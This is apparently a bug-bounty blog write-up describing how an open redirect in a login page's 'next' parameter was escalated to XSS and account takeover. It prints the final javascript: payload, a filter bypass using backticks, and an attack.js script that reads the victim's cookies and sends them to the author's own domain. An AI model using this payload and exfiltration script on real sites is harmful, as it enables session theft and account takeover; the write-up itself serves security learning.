Open-redirect to Account Takeover.

Rishabh
Rishabh
May 19 · 2 min read
We will lead to here later.

Hi everyone this is my first writeup about my first bug and I want to share how I escalated open redirect to Account Takeover. Let’s go

https://victim.com/login/?next=/page/

This was the URL which redirects to the given page after login but the issue was that if I pass https://google.com to next parameter it will redirect to google.com which is external.

After reading more than 15 reports about the open redirect, I came to know what you can do with this vulnerability is redirect the user to your domain and then prompt for sensitive information for which the manipulated URL will look something like this

https://victim.com/login/?next=https://your_domain.com

But I did not report it that way instead I thought why not to try something else like different scheme (javascript:) and luckily there were no filters for that so now the vulnerability escalated from phishing attack to XSS after that I just made a nice POC stealing cookies of the current user who opens the manipulated URL.

Problems I faced during making POC.

  1. Double quotes, single quote, and Parentheses were not allowed.[I used the backtick(`)]

?next= javascript:$.getScript`https://my_own_domain/attack.js`

Attack.js

if(location.host == “my_own_domain”){ 
    Url = new URL(document.location); 
    Parameters = new URLSearchParams(x.search); 
    cookie = Parameters.get(“cookie”); 
    document.write(cookie);
}
else{ 
    var cookie = document.cookie; 
document.location=“https://my_own_domain/attacker.html?cookie="+cookie;
}

TakeAways

  1. Always try the different thing I even tried for XSS (?next=<script>alert(1)</script>) sometimes it works out sometimes it does not but in both cases, you gain the experience and familiarity to the concept.

Final Payload

https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`

My twitter ==> ME

Thanks a lot for reading. Until next time